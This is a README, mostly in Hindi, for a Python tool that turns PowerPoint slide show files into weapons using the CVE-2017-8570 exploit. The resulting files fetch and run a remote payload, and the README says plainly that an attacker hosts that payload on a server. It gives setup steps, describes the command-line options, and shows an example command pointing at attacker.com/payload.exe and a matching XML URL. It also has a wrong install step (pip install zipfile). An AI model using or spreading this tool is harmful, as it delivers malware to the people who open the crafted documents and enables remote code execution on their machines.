
cve-2017-8570 के लिए ppsx फ़ाइल जनरेटर (bhdresh/cve-2017-8570 पर आधारित)
द्वारा: Temesgen Yibeltal ([email protected]) (https://github.com/bhdresh/CVE-2017-8570 (अब हटा दिया गया) के कोड पर आधारित)
ppsx-file-generator एक पायथन टूल है जो मौजूदा फ़ाइल के आधार पर एक पावरपॉइंट स्लाइड शो फ़ाइल उत्पन्न करता है जो दूरस्थ स्रोत से कोड निष्पादित करता है।
टूल दिए गए इनपुट के आधार पर एक पावरपॉइंट स्लाइड शो फ़ाइल और एक xml फ़ाइल उत्पन्न करता है। पावरपॉइंट फ़ाइल xml फ़ाइल तक पहुँचती है जिसमें पेलोड फ़ाइल की जानकारी होती है। एक हमलावर xml फ़ाइल और पेलोड को स्थानीय या सार्वजनिक सर्वर पर रख सकता है और प्रत्येक के लिए url इनपुट के रूप में प्रदान कर सकता है।
पहले, कोड प्राप्त करें:
git clone https://github.com/temesgeny/ppsx-file-generator.git
ppsx-file-generator Python में लिखा गया है और इसे zipfile की आवश्यकता है जिसे Pip का उपयोग करके स्थापित किया जा सकता है:
pip install zipfile
इस कार्य को करने के लिए Microsoft Office PowerPoint की आवश्यकता है।
पहले Microsoft Office PowerPoint खोलें और 'template.ppsx' खोलें। अपनी स्वयं की प्रस्तुति फ़ाइल खोलें और template.ppsx से आइकन 'Coder.exe' को अपनी पावरपॉइंट फ़ाइल की स्लाइड 1 पर कॉपी करें। फ़ाइल को Power Point Show (.ppsx) के रूप में सहेजें। फिर पायथन टूल का उपयोग इस प्रकार करें:
Usage: generate_ppsx.py input_filename -o output_filename -p payload_uri -x xml_uri
input_filename The input ppsx file name.
-o Output .ppsx file name, (inlcude the .ppsx).
-p The payload exe or sct file url.
It must be in an accessible web server. (Optional for xml file)
-x The full xml uri to be called by the ppsx file.
It must be in an accessible web server.(Required)
python generate_ppsx.py -o output.ppsx -p http://attacker.com/payload.exe -x http://attacker.com/content.xml input.ppsx
Generated content.xml successfully
Generated output.ppsx successfully